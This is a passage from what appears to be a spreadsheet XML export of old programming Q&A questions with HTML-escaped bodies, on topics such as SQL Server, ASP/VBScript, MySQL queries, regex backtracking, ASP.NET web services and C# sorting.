&lt;p&gt;Thanks Greg&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scheduled run of stored procedure on SQL server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to set up somehow Microsoft SQL Server to run a stored procedure on regular basis?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting up SSL in Active Directory how-to</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to set up SSL over Active Directory. I googled a lot but could not found a decent write up about how to do this. Please if you know some good resources about this let me know.
Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you change a hashed password using asp.net membership provider if you don't know the current password?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Problem, there's no method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool ChangePassword(string newPassword);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You have to know the current password (which is probably hashed and forgotten).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP/VBScript "Gotchas"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm supporting/enhancing a web application written in Classic ASP/VBScript.  It has been about 10 years since I have used either in a day to day capacity.  I just ran across an issue that I would consider a "gotcha" and was wondering if others had similar things that I should learn to be aware of.&lt;/p&gt;
&lt;p&gt;My issue:&lt;br /&gt;
I had to convert a Column in a SQL Table from float to decimal.  It turns out that decimal isn't a type that is really supported (or supported well) in vbscript. So the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim var1, var2
var1 = rs("DecimalField1").Value
var2 = rs("DecimalField2").Value
If (var1 &amp;lt;&amp;gt; var2) Then
    'Do Something'
End If
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would blow up with a Type Mismatch error on the line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;If (var1 &amp;lt;&amp;gt; var2) Then
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After much searching I found out that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var1 = CDBL(rs("DecimalField1").Value)
var2 = CDBL(rs("DecimalField2").Value)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;resolves the issue.  But that didn't seem like an obvious thing and it took me a while to figure out why the heck I was getting a Type Mismatch on that line.&lt;/p&gt;
&lt;p&gt;So my question to everyone is, what other little quirks like this have you run across?  What are some things within ASP/vbscript that you would think of as "gotchas" that I should be on the lookout for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to test a remoting connection (check state)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an object created in a host application and can access it remotely using remoting, is there any way I can test the connection to ensure it is still "alive"? Maybe an event I can use that fires if the remoting connection gets disconnected, or some property that can tell me the state of the remoting connection.  Is there something like this available?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find out sql server hardware or speed test</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use an sql server regularly and have recently been getting frustrated by the performance. It would be difficult for me to get direct access to find out the hardware so:&lt;/p&gt;
&lt;p&gt;Is there a direct way in management studio to assess performance or find out the exact hardware.&lt;/p&gt;
&lt;p&gt;Alternatively does someone have a set of test sql procedures I could try and ideally compare to other results to get an idea of it's performance.&lt;/p&gt;
&lt;p&gt;So far I have setup a few quick queries on my local machines sql express server just as test these seem to run quicker than the sql server on the network which is meant to be high performance although no one knows when it was last upgraded I have a feeling it hasn't been for 6 or 7 years. Obviously these test don't account for the possibility of others querying at the same time or network transfers of results... Hopefully someone has a better solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>query join question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a right outer join, that almost does what I want...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT
users_usr.firstname_usr,
users_usr.lastname_usr,
credit_acc.given_credit_acc,
users_usr.created_usr,
users_usr.sitenum_usr,
users_usr.original_aff_usr,
users_usr.id_usr
FROM
credit_acc
right Outer Join users_usr ON credit_acc.uid_usr = users_usr.id_usr
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is, I want to add a &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;where credit_acc.type_acc = 'init'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this gets rid of all users who don't have a row in credit_acc... which is WHY I need a right outer join.&lt;/p&gt;
&lt;p&gt;Is there a way to get this without having to do two queries and a union?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I pre-cache images for quick viewing with javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a webpage where I want the user to see a new image when they put thier mouse over a certain part of the image.  I used an image map.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img src="pic.jpg" usemap="#picmap" /&amp;gt;
&amp;lt;map id="picmap" name="picmap"&amp;gt;&amp;lt;area shape="rect" coords ="10,20,30,40"
onMouseOver="mouse_on_write('mouse is on spot')"
onMouseOut="mouse_off('mouse is off spot')"
href="http://www....html" target="_blank" /&amp;gt;
&amp;lt;/map&amp;gt;
&amp;lt;p id="desc"&amp;gt;&amp;lt;/p&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where in the header I defined these functions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;script type="text/javascript"&amp;gt;
 function mouse_off(txt)
    {
    document.getElementById("desc").innerHTML=txt;
    document.p1.src="pic.jpg";
    }
 function mouse_on_write(txt)
    {
    document.getElementById("desc").innerHTML=txt;
    document.p1.src="pic2.jpg";
  &amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works, but it is slow.  When the mouse is put over the second image it takes some few seconds to appear; my temporary solution was to drastically reduce the size of the images because they were huge (at 2.5mb they switch fast now, but still not seamless).  &lt;strong&gt;How can I make the image switching more seamless without reduction in picture quality?&lt;/strong&gt;
 On second thought I realize that I could also just have both images displayed, at a small and a large scale, and &lt;strong&gt;on mouse over they would switch places;  How would I do this?&lt;/strong&gt; Would this reduce lag?    &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Submit changes of only one entity</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I select many rows from one table with one instance of DataContext.
And then do I some changes in properties in the rows, can I submit changes to database only for one of the selected rows?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to use RegEx in ASP/VBScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an ASP website which I need to add a RegEx match to.  Is there any support for RegEx in ASP/VBScript?&lt;/p&gt;
&lt;p&gt;Thank you,&lt;/p&gt;
&lt;p&gt;Brett&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Decoding chunked HTTP with Actionscript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have successfully connected to an HTTP server with ActionScript 3 over sockets. The only problem is, the server is sending chunked HTTP. Is there a generic function in any other language I can look at that clearly shows how to decode the chunking? I'm pretty sure there are no ActionScript libraries around for this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I look over a javascript array without using indexes in YUI?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that jQuery and prototype have a $.each() function for iterating over each element in an array. Does YUI offer any help with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does one - without inheritance - override a class method and call the original from within the new method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found one source which successfully overrode &lt;code&gt;Time.strftime&lt;/code&gt; like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Time
  alias :old_strftime :strftime
  def strftime
    #do something
    old_strftime
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The trouble is, &lt;code&gt;strftime&lt;/code&gt; is an instance method.  I need to override &lt;code&gt;Time.now&lt;/code&gt; - a class method - in such away that any caller gets my new method, while the new method still calls the original &lt;code&gt;.now&lt;/code&gt; method.  I've looked at &lt;code&gt;alias_method&lt;/code&gt; and have met with no success.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Windows Role authentication in the App.config with WCF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a WCF service and a net.tcp endpoint with serviceAuthentication's principal PermissionMode set to UseWindowsGroups.&lt;/p&gt;
&lt;p&gt;Currently in the implementation of the service i am using the PrincipalPermission attribute to set the role requirements for each method. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        [PrincipalPermission(SecurityAction.Demand, Role = "Administrators")]
        [OperationBehavior(Impersonation = ImpersonationOption.Required)]
        public string method1()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am trying to do pretty much the same exact thing, except have the configuration for the role set in the app.config. Is there any way to do this and still be using windows groups authentication?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TortoiseSVN - Ignoring files within a folder already in the repository</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I ignore all files within a folder under source control?&lt;/p&gt;
&lt;p&gt;&lt;code&gt;/project/published/&lt;/code&gt; is a folder I want to keep&lt;/p&gt;
&lt;p&gt;&lt;code&gt;/project/published/some_file(s)&lt;/code&gt; are files/folders I don't want&lt;/p&gt;
&lt;p&gt;More Details: Currently when I go to commit changes for my project I see a lot of files that I don't want to. They are files that get published to a folder and I don't need them under source control. I won't ever know the names of these files as they are chosen by users.&lt;/p&gt;
&lt;p&gt;I tried to use the property &lt;code&gt;svn:ignore&lt;/code&gt; with value &lt;code&gt;published/*&lt;/code&gt; but that did not work. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Prime number calculation fun</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're having a bit of fun here at work. It all started with one of the guys setting up a Hackintosh and we were wondering whether it was faster than a Windows Box of (nearly) same specs that we have. So we decided to write a little test for it. Just a simple Prime number calculator. It's written in Java and tells us the time it takes to calculate the first n Prime numbers.&lt;/p&gt;
&lt;p&gt;Optimised version below - now takes ~6.6secs&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Primes {
    public static void main(String[] args) {
    	int topPrime = 150000;
    	int current = 2;
    	int count = 0;
    	int lastPrime = 2;
    	long start = System.currentTimeMillis();
    	while (count &amp;lt; topPrime) {
    		boolean prime = true;
    		int top = (int)Math.sqrt(current) + 1;
    		for (int i = 2; i &amp;lt; top; i++) {
    			if (current % i == 0) {
    				prime = false;
    				break;
    			}
    		}
    		if (prime) {
    			count++;
    			lastPrime = current;
    		}
    		if (current == 2) {
    		 current++;
    		} else {
    			current = current + 2;
    		}
    	}
    	System.out.println("Last prime = " + lastPrime);
    	System.out.println("Total time = " + (double)(System.currentTimeMillis() - start) / 1000);
    } 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We've pretty much lost the plot of the whole Hackintosh vs PC thing and are just having some fun with optimising it. First attempt with no optimisations (the above code has a couple) ran around 52.6min to find the first 150000 prime numbers. This optimisation is running around 47.2mins.&lt;/p&gt;
&lt;p&gt;If you want to have a go and post your results, then stick em up.&lt;/p&gt;
&lt;p&gt;Specs for the PC I'm running it on are Pentium D 2.8GHz, 2GB RAM, running Ubuntu 8.04.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Best Optimisation so far has been the square root of current, first mentioned by Jason Z.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why isn't MySQL using the index for this subquery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I used to do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT layerID
FROM layers
WHERE ownerID = ?
AND collectionID = ?
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which would give me an array of layerID's, and then I'd loop and do this for each one:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT DATA
FROM drawings
WHERE layerID = ?
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And it all worked fine. So now I'm trying to do it in one step, so I try this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT DATA , layerID
FROM drawings
WHERE layerID = ANY (
  SELECT layerID
  FROM layers
  WHERE ownerID = ?
  AND collectionID = ?
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But for some reason, it doesn't use the index, for the main query, &lt;code&gt;SELECT DATA etc&lt;/code&gt;! So this one combined query takes much much longer to complete, versus the separate queries I was doing before. (By theway, the subquery, &lt;code&gt;SELECT layerID etc&lt;/code&gt; still uses the index).&lt;/p&gt;
&lt;p&gt;I've determined if it's using a query or not by using the 'EXPLAIN' statement.&lt;/p&gt;
&lt;p&gt;I have individual indexes on the &lt;code&gt;ownerID&lt;/code&gt; and &lt;code&gt;collectionID&lt;/code&gt; columns in the &lt;code&gt;layers&lt;/code&gt; table, and on the &lt;code&gt;layerID&lt;/code&gt; column in the &lt;code&gt;drawings&lt;/code&gt; table.&lt;/p&gt;
&lt;p&gt;What am I doing wrong with my query?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2005 and iTunes Library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;what's the easiest way to bulk load my iTunes library xml into an existing SQL Server database?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Application_End global.asax</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anybody tell me when Application_End is triggered in a lifecycle of an application? When all sessions are ended, will Application_End be triggered automatically? + Are there any other reasons why Application_End could be triggered?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Guidelines for / differences between cache / pool / cache pool</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing some design (initially for Java) (but may extend to .NET in the future?) and I'm getting confused between the terms "cache" and "pool".&lt;/p&gt;
&lt;p&gt;As far as I can see, the main point of difference is what is contained in them?&lt;/p&gt;
&lt;p&gt;Any guidelines as to which should be used when?&lt;/p&gt;
&lt;p&gt;And what then is a "cache pool" which is referred to in a number of articles?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Can I put information in a outputstream from tapestry5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How Can I put information in a outputstream from tapestry5 ?&lt;/p&gt;
&lt;p&gt;I need a page when a user enters it open a dialog for save or open the file with the outputstream information.&lt;/p&gt;
&lt;p&gt;I write the next code:&lt;/p&gt;
&lt;p&gt;public class Index {&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Inject
private RequestGlobals requestGlobals;
@OnEvent("activate")
public void onActivate() {
    try {
        HttpServletResponse response = requestGlobals.getHTTPServletResponse();
        response.setContentType("text/txt");
        PrintWriter out = response.getWriter();
        out.println("hellooooooo");
        out.flush();
    } catch (IOException ex) {
        Logger.getLogger(Index.class.getName()).log(Level.SEVERE, null, ex);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;p&gt;I hope that the result is only "helloooooooo" but is ("helloooooooo" + my html raw page)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SSH hangs on Mac Book Pro; AFS and Network Preferences?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having an issue with SSH hanging on my Mac Book Pro. This only happens to me once I get home from work after I have used SSH while at work. The three factors I have narrowed the issue down to are SSH, our work AFS network drive and the method of network connectivity.&lt;/p&gt;
&lt;p&gt;At work we use an AFS drive with Kerberos Authentication to do all of our software development work on. I authenticate with Kerberos in order to gain access to the AFS drive where all my source code lives, but I open a local editor (Eclipse) which references the files on the AFS drive. Whenever I need to compile my code, I SSH in to my development server (which is also authenticated to the AFS drive) and compile from there. (Sanity Note: I know that it is a super wacky setup, but I promise I had NOTHING to do with it. I'm just making do with what I've got.)&lt;/p&gt;
&lt;p&gt;For my Network Preferences, I use the Automatic location all the time. For that configuration I have Built-in Ethernet en1 configured to use DHCP and our company's DNS server for when I'm at work (there is no wireless available). When I go home I connect to my home network via wireless, again using DHCP.&lt;/p&gt;
&lt;p&gt;I have a hunch that the AFS connection/Ethernet configuration is somehow the culprit here. Restarting the SSH daemon doesn't correct the problem. The only way I have found to correct the issue is by restarting the computer each time I want to use SSH. Keep in mind that I have no other (known) networking issues while at home after I've had the laptop at work. &lt;/p&gt;
&lt;p&gt;I have a co-worker who has reported to me the same issue on his MBP.&lt;/p&gt;
&lt;p&gt;I'm truly stumped on this one. Please provide some guidance. Thanks! &lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#: How do you tell which item index is selected in ListView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;C#: How do you tell which item index is selected in ListView?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sidebar form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I create a Sidebar form in delphi.&lt;/p&gt;
&lt;p&gt;I try the ScreenSnap and Align properties
but I need that the form stay visible even if the user maximize other forms, without been on top. Just like the windows sidebar do.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;update&lt;/strong&gt; from the comments: if a window is maximized it maximizes next too the window, not in front of or behind.&lt;/p&gt;
&lt;p&gt;Thanks &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unpacking _WTS_CLIENT_ADDRESS.Address in vb.net (retreiving IP address from Terminal Services Client)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;StructLayout(LayoutKind.Sequential)&amp;gt; _
    Public Structure _WTS_CLIENT_ADDRESS
        Public AddressFamily As Integer
        &amp;lt;MarshalAs(UnmanagedType.ByValArray, SizeConst:=20)&amp;gt; _
        Public Address() As Byte
    End Structure
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which is populated by the following call:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        Dim _ClientIPAddress As New _WTS_CLIENT_ADDRESS
        Dim rtnPtr As IntPtr
        Dim rtncount As Int32
        NativeMethods.WTSQuerySessionInformation(CInt(NativeMethods.WTS_CURRENT_SERVER_HANDLE), NativeMethods.WTS_CURRENT_SESSION, NativeMethods.WTS_INFO_CLASS.WTSClientAddress, rtnPtr, rtncount)
        '_ClientIPAddress()
        _ClientIPAddress = _
            CType(System.Runtime.InteropServices.Marshal.PtrToStructure(rtnPtr, GetType(_WTS_CLIENT_ADDRESS)), _WTS_CLIENT_ADDRESS)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The address byte array is being populated, but I have no idea how to convert it into a useful string or integer values.  The MDSN documentation is sparse: &lt;a href="http://msdn.microsoft.com/en-us/library/aa383857" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/aa383857&lt;/a&gt;(VS.85).aspx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I specify in my ccnet config file how to do daily builds?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I specify in my ccnet config file how to do daily builds?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What GOOD tools are available for generating ERD from a SQL Server Database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to generate an Entity Relationship Diagram from an existing MS SQLServer 2005 database. What tools are available? Specifically,I am not only interested in ERD's more directly I am looking for a tool to help quickly learning and analysing a medium size (schema wise not really row wise) database structure.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does this regular expression kill the Java regex engine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this naive regex "&amp;lt;([\s]|[^&amp;lt;])+?&gt;" (excluding the quotation marks). It seems so
straightforward but it is indeed evil when it works against the below HTML text. It sends the Java regular expression engine to an infinite loop. &lt;/p&gt;
&lt;p&gt;I have another regex ("&amp;lt;.+?&gt;"), which does somewhat the same thing, but it doesn't kill anything. Do you know why this happens?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script language="JavaScript" type="text/javascript"&amp;gt;
        var numDivs, layerName;
        layerName = "lnavLayer";
        catLinkName = "category";
        numDivs = 2;
        function toggleLayer(layerID){
            if (!(navigator.appName == "Netscape" &amp;amp;&amp;amp; navigator.appVersion.substr(0, 1) &amp;lt; 5)){
                thisLayer = document.getElementById(layerName + layerID);
                categoryLink = document.getElementById(catLinkName + layerID);
                closeThem();
                if (thisLayer.className == 'subnavDefault'){
                    thisLayer.className = 'subnavToggled';
                    categoryLink.className = 'leftnavLinkSelectedSection';
                }
            }
        }
        function closeThem(){
            for(x = 0; x &amp;lt; numDivs; x++){
                theLayer = document.getElementById(layerName + (x
+ 1));
                thecategoryLink = document.getElementById(catLinkName + (x + 1));
                theLayer.className = 'subnavDefault';
                thecategoryLink.className = 'leftnavLink';
            }
        } var flag = 0; var lastClicked = 0
    //--&amp;gt;
    &amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it even keeps looping with an online Java regex tool (such as &lt;a href="http://www.fileformat.info/tool/regex.htm" rel="nofollow"&gt;www.fileformat.info/tool/regex.htm&lt;/a&gt;) or a utility like &lt;a href="http://www.regexbuddy.com/" rel="nofollow"&gt;RegexBuddy&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get the subdomain from a URL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Getting the subdomain from a URL sounds easy at first.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://www.domain.example
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Scan for the first period then return whatever came after the "http://" ...&lt;/p&gt;
&lt;p&gt;Then you remember&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://super.duper.domain.example
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Oh. So then you think, okay, find the last period, go back a word and get everything before! &lt;/p&gt;
&lt;p&gt;Then you remember&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://super.duper.domain.co.uk
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And you're back to square one. Anyone have any great ideas besides storing a list of all TLDs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to return JSON from a 2.0 asmx web service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using .Net framework 2.0 / jQuery to make an Ajax call to a 2.0 web service. No matter what I set the contentType to in the ajax call, the service always returns XML. I want it to return Json!&lt;/p&gt;
&lt;p&gt;Here is the call:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;      $(document).ready(function() {
         $.ajax({
            type: "POST",
            url: "DonationsService.asmx/GetDate",
            data: "{}",
            contentType: "application/json; charset=utf-8",
            dataType: "json",
            success: function(msg) {
              // Hide the fake progress indicator graphic.
              $('#RSSContent').removeClass('loading');
              // Insert the returned HTML into the &amp;lt;div&amp;gt;.
              $('#RSSContent').html(msg.d);
            }
          });
        });    
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is what the request header looks like in Fiddler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;POST /DonationsService.asmx/GetDate HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://localhost:1238/text.htm
Accept: application/json, text/javascript, */*
Content-Type: application/json; charset=utf-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; eMusic DLM/4; .NET CLR 2.0.50727)
Host: localhost:1238
Content-Length: 2
Connection: Keep-Alive
Pragma: no-cache
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried setting the contentType to 'text/json' and get the same results.&lt;/p&gt;
&lt;p&gt;Here is the web service method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;WebMethod()&amp;gt; _
Public Function GetDate() As String
    'just playing around with Newtonsoft.Json
    Dim sb As New StringBuilder
    Dim sw As New IO.StringWriter(sb)
    Dim strOut As String = String.Empty
    Using jw As New JsonTextWriter(sw)
        With jw
            .WriteStartObject()
            .WritePropertyName("DateTime")
            .WriteValue(DateTime.Now.ToString)
            .WriteEndObject()
        End With
        strOut = sw.ToString
    End Using
    Return strOut
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and here is what it returns:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;string xmlns="http://DMS.Webservices.org/"&amp;gt;{"DateTime":"11/13/2008 6:04:22 PM"}&amp;lt;/string&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone know how to force the web service to return Json when I ask for Json?&lt;/p&gt;
&lt;p&gt;Please don't tell me to upgrade to .Net Framework 3.5 or anything like that (I'm not that stupid). I need a 2.0 solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I convert a string to a number in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would I convert a string holding a number into its numeric value in Perl?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# List&lt;&gt; Sort by x then y</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Similar to &lt;a href="http://stackoverflow.com/questions/188141/c-list-orderby-alphabetical-order"&gt;List&amp;lt;&amp;gt; OrderBy Alphabetical Order&lt;/a&gt;, we want to sort by one element, then another.  we want to achieve the functional equivalent of &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * from Table ORDER BY x, y  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We have a class that contains a number of sorting functions, and we have no issues sorting by one element.&lt;br&gt;
For example:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyClass {
    public int x;
    public int y;
}  
List&amp;lt;MyClass&amp;gt; MyList;
public void SortList() {
    MyList.Sort( MySortingFunction );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And we have the following in the list:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Unsorted     Sorted(x)     Desired
---------    ---------    ---------
ID   x  y    ID   x  y    ID   x  y
[0]  0  1    [2]  0  2    [0]  0  1
[1]  1  1    [0]  0  1    [2]  0  2
[2]  0  2    [1]  1  1    [1]  1  1
[3]  1  2    [3]  1  2    [3]  1  2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Stable sort would be preferable, but not required. Solution that works for .Net 2.0 is welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTML hyperlink with mouse over image</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having a Html hyperlink. I need to link this hyperlink to another page.When I place the mouse over the link. It should show the image.
how to do this&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I use Html.ValidationSummary with Ajax.BeginForm?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an AJAX form that I am creating in my MVC project.  If the form is submitted using normal browser function and a page refresh occurs I get validation information rendered in the form (the built in MVC validation based on ViewData.ModelState).&lt;/p&gt;
&lt;p&gt;Is there a similiar validation mechanism for AJAX forms?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% using (Ajax.BeginForm("Create", "GraphAdministration", new AjaxOptions()
    {
        OnSuccess = "newGraphSuccess",
        OnFailure = "newGraphFailure",
        HttpMethod = "POST"
    }))
{ %&amp;gt;
    &amp;lt;!-- some form stuff in here !--&amp;gt;
&amp;lt;% } //end form %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why do requests and responses get lost?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Even on big-time sites such as Google, I sometimes make a request and the browser just sits there.  The hourglass will turn indefinitely until I click again, after which I get a response instantly.  So, the response or request is simply getting lost on the internet.  &lt;/p&gt;
&lt;p&gt;As a developer of ASP.NET web applications, is there any way for me to mitigate this problem, so that users of the sites I develop do not experience this issue? If there is, it seems like Google would do it. Still, I'm hopeful there is a solution.&lt;/p&gt;
&lt;p&gt;Edit: I can verify, for our web applications, that every request actually reaching the server is served in a few seconds even in the absolute worst case (e.g. a complex report). I have an email notification sent out if a server ever takes more than 4 seconds to process a request, or if it fails to process a request, and have not received that email in 30 days.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Updating an associative table in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Below is my (simplified) schema (in MySQL ver. 5.0.51b) and my strategy for updating it. There has got to be a better way. Inserting a new item requires 4 trips to the database and editing/updating an item takes up to &lt;strong&gt;7&lt;/strong&gt;!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;items&lt;/strong&gt;: itemId, itemName
&lt;br /&gt;&lt;strong&gt;categories&lt;/strong&gt;: catId, catName
&lt;br /&gt;&lt;strong&gt;map&lt;/strong&gt;: mapId*, itemId, catId
&lt;br /&gt;* mapId (varchar) is concat of itemId + | + catId&lt;/p&gt;
&lt;p&gt;1) If inserting: insert item. Get itemId via MySQL API.
&lt;br /&gt;Else updating: just update the item table. We already have the itemId.&lt;/p&gt;
&lt;p&gt;2) Conditionally batch insert into &lt;code&gt;categories&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT IGNORE INTO categories (catName)
VALUES ('each'), ('category'), ('name');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;3) Select IDs from &lt;code&gt;categories&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT catId FROM categories
WHERE catName = 'each' OR catName = 'category' OR catName = 'name';
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;4) Conditionally batch insert into &lt;code&gt;map&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT IGNORE INTO map (mapId, itemId, catId)
VALUES ('1|1', 1, 1), ('1|2', 1, 2), ('1|3', 1, 3);
&lt;/code&gt;&lt;/pre&gt;
